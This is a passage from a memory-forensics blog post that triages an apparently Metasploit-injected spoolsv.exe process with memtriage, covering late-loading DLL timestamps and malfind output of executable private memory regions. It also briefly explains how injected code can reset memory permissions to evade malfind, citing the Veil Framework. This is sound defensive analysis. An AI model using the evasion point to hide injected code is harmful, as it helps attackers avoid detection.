normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\USERENV.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\profapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\gpapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\VERSION.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\DSROLE.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\win32spl.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\SHLWAPI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\DEVRTL.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\SPINF.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\rsaenh.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WINSTA.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\cscapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\netutils.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#fcff01">2020-07-19 13:45:05 UTC+0000 C:\Windows\System32\WTSAPI32.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\system32\WININET.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\system32\iertutil.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\WINHTTP.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\dhcpcsvc6.DLL</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\dhcpcsvc.DLL</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\webio.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\system32\PSAPI.DLL</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\WINMM.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\WINMMBASE.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\system32\ole32.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\MPR.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\NETAPI32.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\wkscli.dll</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Take note of the load times for most of these dlls. Most are loaded shortly after the process starts. There's one outlier, </font><font face="courier">WTSAPI32.dll</font><font face="inherit"> and then there's a cluster of dlls loaded right around the time of our incident, 2020-07-19 20:04:32 UTC.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><span style="background-color: white;"><font><font face="inherit"><span style="font-variant-ligatures: no-common-ligatures;">But why are these dlls loaded? The PowerShell we saw showed a small bit of shellcode and doesn't Metasploit do </span></font><a href="https://www.microsoft.com/security/blog/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/" style="-webkit-text-stroke-width: 0px; font-family: inherit; font-style: normal; font-variant-caps: normal; font-variant-ligatures: no-common-ligatures; font-weight: 400; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;" target="_blank">reflective loading without writing to disk and without registering dlls in the process</a><font face="inherit"><span style="font-variant-ligatures: no-common-ligatures;">? The answer is, yes, for the Metasploit specific dlls, but those dlls import functions from other system dlls as the authors of Metasploit don't want to write everything from scratch</span></font><font face="inherit"><span style="font-variant-ligatures: no-common-ligatures;">. Those 13 late loading dlls could make for a useful detection -- perhaps Sysmon should have a setting to only log late loading dlls. They may not all be malicious like the one outlier above, but logging late loading dlls could reduce the noise of logging all dll loads.</span></font></font></span></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><br /></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;">Let's see if other <font face="courier">memtriage</font> plugins can shed more light on what's going on, starting with <font face="courier">malfind</font>, which can be used to look for injected code in process memory. Here's the command I ran against the <font face="courier">spoolsv.exe</font> process id, 1120:</div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><br /></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">.\memtriage.exe --pid 1120 --plugins malfind --output csv --outfile malfind.csv</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">The data in this CSV output file can again be easily converted to PowerShell objects and reviewed using something like this:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">$malfind = Get-Content .\malfind.csv | ConvertFrom-Csv</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">PS> $malfind</font></span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process<span class="Apple-converted-space"> </span>: spoolsv.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Pid<span class="Apple-converted-space"> </span>: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Address<span class="Apple-converted-space"> </span>: 14417920</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag <span class="Apple-converted-space"> </span>: VadS</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Protection : PAGE_EXECUTE_READWRITE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Flags<span class="Apple-converted-space"> </span>: PrivateMemory: 1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Data <span class="Apple-converted-space"> </span>: Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process<span class="Apple-converted-space"> </span>: spoolsv.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Pid<span class="Apple-converted-space"> </span>: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Address<span class="Apple-converted-space"> </span>: 1033265020928</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag <span class="Apple-converted-space"> </span>: VadS</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Protection : PAGE_EXECUTE_READWRITE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Flags<span class="Apple-converted-space"> </span>: PrivateMemory: 1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Data <span class="Apple-converted-space"> </span>: Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process<span class="Apple-converted-space"> </span>: spoolsv.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Pid<span class="Apple-converted-space"> </span>: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Address<span class="Apple-converted-space"> </span>: 1033271443456</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag <span class="Apple-converted-space"> </span>: VadS</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Protection : PAGE_EXECUTE_READWRITE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Flags<span class="Apple-converted-space"> </span>: PrivateMemory: 1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Data <span class="Apple-converted-space"> </span>: Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process<span class="Apple-converted-space"> </span>: spoolsv.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Pid<span class="Apple-converted-space"> </span>: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Address<span class="Apple-converted-space"> </span>: 1033272295424</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag <span class="Apple-converted-space"> </span>: VadS</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Protection : PAGE_EXECUTE_READWRITE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Flags<span class="Apple-converted-space"> </span>: PrivateMemory: 1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Data <span class="Apple-converted-space"> </span>: Protection: 6</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above, </font><font face="courier">malfind's</font><font face="inherit"> output. When called as above, </font><font face="courier">malfind</font><font face="inherit"> shows that there are four suspect memory regions in </font><font face="courier">spoolsv.exe's</font><font face="inherit"> process memory. I don't know the exact heuristic </font><font face="courier">malfind</font><font face="inherit"> uses, but it may be a combination of the </font><font face="courier">Protection</font><font face="inherit"> and </font><font face="courier">Flags</font><font face="inherit">. The </font><font face="courier">PrivateMemory</font><font face="inherit"> flag means the memory region is not backed by a file on disk. Generally a dll loaded in a process would be backed by a dll on disk. The Protection setting of PAGE_EXECUTE_READWRITE is an artifact of the code being written into the memory region. These permissions can be updated after injection, in fact, <a href="https://twitter.com/christruncer" target="_blank">Chris Truncer's</a> <a href="https://github.com/Veil-Framework/Veil" target="_blank">Veil Framework</a> <a href="https://www.veil-framework.com/" target="_blank">explicitly calls this out</a> and addresses it. This would be a fun future project for testing </font><font face="courier">malfind</font><font face="inherit">, and maybe it's been done already.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">The <font face="courier">malfind</font> plugin can do more, if run without CSV output, you'll get something like this:</span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">.\memtriage.exe --pid 1120 --dumpdir .\malfind_dump --plugins malfind</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>********************Plugin: malfind********************</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process: spoolsv.exe, Pid: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: 